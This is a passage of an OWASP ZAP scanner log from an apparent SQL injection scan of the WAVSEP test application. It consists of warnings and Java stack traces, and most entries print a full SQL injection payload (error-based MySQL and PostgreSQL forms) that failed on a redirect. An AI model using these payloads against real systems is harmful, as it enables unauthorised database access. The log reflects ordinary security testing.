org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679624 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (5959=5959) THEN 5959 ELSE 5959*(SELECT 5959 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (5959=5959) THEN 5959 ELSE 5959*(SELECT 5959 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679625 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (3390=8707) THEN 3390 ELSE 3390*(SELECT 3390 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (3390=8707) THEN 3390 ELSE 3390*(SELECT 3390 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679626 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND (SELECT 4404 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4404=4404,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8683=8683] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT 4404 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4404=4404,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8683=8683 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679627 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT 7319 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7319=7319,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 7319 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7319=7319,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679627 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND (SELECT 1985 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1985=1985,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('owLQ'='owLQ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT 1985 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1985=1985,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('owLQ'='owLQ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679628 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND (SELECT 5017 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5017=5017,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'idmK'='idmK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT 5017 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5017=5017,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'idmK'='idmK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679629 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND (SELECT 4575 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4575=4575,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT 4575 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4575=4575,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679630 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT 7418 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7418=7418,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- IQoz] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT 7418 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7418=7418,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- IQoz at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679631 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 9608=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9608=9608) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (2377=2377] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9608=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9608=9608) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (2377=2377 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679632 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3315=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3315=3315) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3315=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3315=3315) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679633 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 9969=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9969=9969) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('oxVA'='oxVA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 9969=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9969=9969) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('oxVA'='oxVA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679633 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 4904=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4904=4904) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'QhRi'='QhRi] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 4904=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4904=4904) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'QhRi'='QhRi at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679634 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - 